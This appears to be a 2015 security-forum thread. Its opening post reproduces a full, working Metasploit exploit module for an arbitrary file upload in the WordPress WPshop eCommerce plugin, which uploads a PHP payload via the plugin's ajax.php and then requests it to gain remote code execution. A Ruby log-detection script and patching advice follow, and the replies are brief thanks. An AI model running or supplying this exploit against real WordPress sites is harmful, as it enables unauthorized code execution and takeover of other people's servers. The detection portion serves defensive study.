90_ Posted on 2015-4-25 19:13:26

WordPress eCommerce 1.3.9.5 Upload Vulnerability

Description:
This Metasploit module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin versions 1.3.3.3 to 1.3.9.5. It allows you to upload arbitrary PHP code and get remote code execution. This Metasploit module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
        from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
        code execution. This module has been tested successfully on WordPress WPshop eCommerce
        1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
      },
      'Author'         =>
        [
          'g0blin', # Vulnerability Discovery, initial msf module
          'Roberto Soares Espreto <robertoespretogmail.com>'  # Metasploit Module Pull Request
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7830'],
          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget'  => 0)
    )
  end
 
  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  end
 
  def exploit
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
 
    data = Rex::MIME::Message.new
    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s
 
    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )
 
    if res
      if res.code == 200 && res.body =~ /#{php_page_name}/
        print_good("#{peer} - Payload uploaded as #{php_page_name}")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end
 
    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
      5
    )
  end
end
 
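From the defender's side, the module above leaves a recognisable footprint: a POST to the plugin's ajax.php with a multipart upload, followed by a request for a .php file under wp-content/uploads. The following Ruby is an added example (not part of the original post or the Metasploit module) that runs that detection logic over constructed access-log lines; the IPs, file name and timestamps are made up.

```ruby
require 'time'

# Apache/nginx "combined" access log format; the sample lines below are constructed.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

UPLOAD_ENDPOINT = %r{/wp-content/plugins/wpshop/includes/ajax\.php\z}
PHP_IN_UPLOADS  = %r{/wp-content/uploads/.*\.php\z}i

SAMPLE_LOG = [
  '203.0.113.7 - - [25/Apr/2015:19:10:01 +0800] "POST /wp-content/plugins/wpshop/includes/ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [25/Apr/2015:19:10:03 +0800] "GET /wp-content/uploads/kqzxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [25/Apr/2015:19:12:30 +0800] "GET /wp-content/uploads/2015/04/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'
]

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path: m[:path].split('?').first, # drop the query string before matching
    status: m[:status].to_i }
end

# Flags (a) any request for a PHP file inside the uploads directory, which should never
# execute PHP at all, and (b) a POST to the WPshop ajax.php endpoint followed within
# `window` seconds by such a request from the same client: the upload-then-call sequence
# the module performs.
def detect(lines, window: 300)
  alerts = []
  last_post = {} # ip => time of the most recent POST to the ajax endpoint
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_ENDPOINT
      last_post[e[:ip]] = e[:time]
    elsif e[:path] =~ PHP_IN_UPLOADS
      alerts << { ip: e[:ip], path: e[:path], reason: 'php_in_uploads' }
      t = last_post[e[:ip]]
      if t && (e[:time] - t).between?(0, window)
        alerts << { ip: e[:ip], path: e[:path], reason: 'wpshop_upload_then_exec' }
      end
    end
  end
  alerts
end

detect(SAMPLE_LOG).each { |a| puts "#{a[:reason]}: #{a[:ip]} -> #{a[:path]}" }
```

The second alert is the high-confidence one; the first fires on its own whenever PHP is served from the uploads directory, which is worth blocking at the web server regardless of which plugin put the file there, alongside updating WPshop past 1.3.9.5.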

a1343868513 Posted on 2015-4-25 21:26:45

666666666, the forum isn't as lively as 08sec used to be.

yusiii Posted on 2015-6-28 18:14:05

Support, looks good!

admin1964 Posted on 2015-6-28 19:53:54

Learning the technique, keep it up!

wtsqq123 Posted on 2015-6-29 00:28:16

Thanks to the OP for sharing~

菜鸟小羽 Posted on 2015-6-29 07:12:19

Not bad, bumped.

wilist Posted on 2015-6-29 15:00:01

Not bad, bumped.

a136 Posted on 2015-6-30 03:21:36

Not bad, bumped.

08-wh Posted on 2015-6-30 03:39:48

Not bad, bumped.

r00tc4 Posted on 2015-7-1 02:42:14

Support, looks good!